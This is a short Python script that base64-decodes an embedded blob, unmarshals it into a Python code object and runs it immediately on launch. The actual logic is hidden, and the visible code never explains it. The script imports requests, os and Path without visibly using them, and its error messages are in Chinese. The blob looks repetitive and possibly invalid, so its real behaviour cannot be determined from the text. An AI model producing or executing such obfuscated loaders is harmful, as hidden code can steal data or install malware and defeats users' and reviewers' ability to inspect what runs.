#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import os,sys,json,requests,base64,marshal,types
from pathlib import Path

_EXEC = b'YwAAAAAAAAABAAAAaQAAAGwAAABzAwAAAKQBAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzFAAAAKwBAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzJAAAAMwBAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzEwAAAOwBAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzFAAAAAgCAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzGQAAABwCAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzGAAAADUCAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzGgAAAE0CAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzFQAAAGcCAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzIAAAAHwCAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzEwAAAJwCAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzFAAAALACAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzFAAAAMQCAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzGQAAANgCAAAAYwAAAAAAAAABAAAAaQAAAGwAAABzGAAAAA=='

def _run():
    try:
        _d = base64.b64decode(_EXEC)
        _c = marshal.loads(_d)
        _main = types.FunctionType(_c, globals(), '_main')
        return _main
    except Exception as e:
        print(f"❌ 解密失败: {e}")
        return None

_main = _run()
if _main:
    _main()
else:
    print("❌ 脚本启动失败")
    sys.exit(1)
